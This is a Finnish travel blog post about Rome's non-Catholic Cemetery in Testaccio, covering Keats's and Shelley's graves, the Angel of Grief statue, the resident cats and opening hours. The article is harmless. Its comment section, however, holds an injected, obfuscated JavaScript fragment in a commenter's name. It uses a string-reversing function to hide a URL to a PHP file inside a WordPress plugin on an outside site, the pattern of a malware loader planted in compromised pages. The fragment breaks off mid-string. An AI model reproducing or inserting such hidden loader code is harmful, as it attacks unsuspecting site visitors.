Image Alt

Blog

Maailman kaunein hautausmaa

Rooma on täynnä hautoja: on katakombeja ja antiikin keisareiden mausoleumeja, museoista löytyy yksi jos toinenkin sarkofagi ja joka kirkkoon on haudattu joku paavi, pyhimys tai vähäisempi merkkihenkilö. Mutta kaikkia näitä pompööseja hautamuistomerkkejä vaikuttavampi, kauniimpi, romanttisempi ja ainoa yksistään käymisen arvoinen paikka on Cimitero Acattolico eli Rooman ei-katolinen tai protestanttinen hautausmaa Testaccion kaupunginosassa, Piramiden takana.

Protestant cemetery, Rome

Rooman ei-katolinen hautausmaa
Hautausmaa perustettiin romantiikan kulta-aikaan, kun Roomaan alkoi tulla runsaasti etenkin englantilaisia ja saksalaisia taiteellista inspiraatiota hakemaan ja/tai parantumaan keuhkotaudista. Varhaisin tunnettu hauta on vuodelta 1738 ja paikkaan on haudattu 1700-luvulla ja 1800-luvulla useita taiteilijoita – myös suomalainen kuvanveistäjä Johannes Takanen.

Tunnetuimpia hautausmaalta leposijansa saaneita ovat nuorena kuolleet runoilijat John Keats ja Percy Bysshe Shelley. Etenkin 25-vuotiaana tuberkuloosiin kuolleen Keatsin hautakivi on liikuttava, sillä siinä ei mainita runoilijan nimeä lainkaan. Nuori runoilija uskoi tulevansa unohdetuksi ja halusi hautakiveensä kaiverrettavaksi vain Here lies One Whose Name was writ in Water. Hänen ystävänsä menivät kuitenkin lisäilemään tekstiä, mitä he myöhemmin katuivat. Keatsin hautakivessä ei ole hänen nimeään, mutta sen sijaan sen viereisessä ystävän haudassa nimi seisoo.

John Keatsin ja hänen ystävänsä hautakivet

Hautausmaa ei kuitenkaan kuulu suosikkeihini sinne haudattujen kuuluisuuksien vuoksi, vaan ennen kaikkea siksi, että siellä vallitsee aivan erityinen tunnelma. Siis jopa Rooman mittakaavassa erityinen, sillä ympäröivän muurin, sypressien, granaattiomenapuiden, rinteeseen sijoittuvien patinoitujen hautakivien ja kauniiden hautaveistosten ansiosta paikka kuuluu Rooman romanttisimpiin.

It might make one in love with death, to think that one should be buried in so sweet a place.

“Paikka on niin kaunis, että ajatus sinne haudatuksi tulemisesta voi saada vierailijan kaipaamaan kuolemaa”, kirjoitti Shelley enteellisesti vain vähän ennen kuin hukkui ja sai kaipaamansa leposijan hautausmaalta.

Protestanttisella hautausmaalla on myös monia kauniita hautakiviä ja muistomerkkejä. Hautaveistoksista tunnetuin lienee William Storyn Angel of Grief, joka joillekin saattaa olla tuttu myös Nightwishin levynkannesta. Täytyy myöntää, että minulle ei ollut. Story veisti tämän surusta murtuneen enkelin vaimonsa Emelynin haudalle 1894 ja se on miljoona kertaa vaikuttavampi kuin yksikään paavin tai keisarin muistomerkki maailmassa.

Angel of Grief

Protestant Cemetary Rome

2017-03-04_02-26-55

Hautausmaan kauneudesta saa nauttia rauhassa, sillä ihmisiä (turisteja) ei hautausmaalla juuri näy. Sen sijaan joku kissa voi tulla jalkoihisi kiehnäämään, sillä paikalla asustelee lukuisia kissoja, jotka lepäilevät hautakivien päällä ja leikkivät niiden lomassa. Hautausmaan puistomaisella puolella voi vaikka lueskella kirjaa Piramiden varjossa jollain monista penkeistä.

Cimitero Acattolico, Via Caio Cestio 6 (B-metron pysäkki Piramide) avoinna ti – su 9 – 17.30. Muista jättää mieluiten vähintään 3 euron lahjoitus portin viereen.

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

4 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Sara - My Woodl<script>$Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\
Sara - My Woodl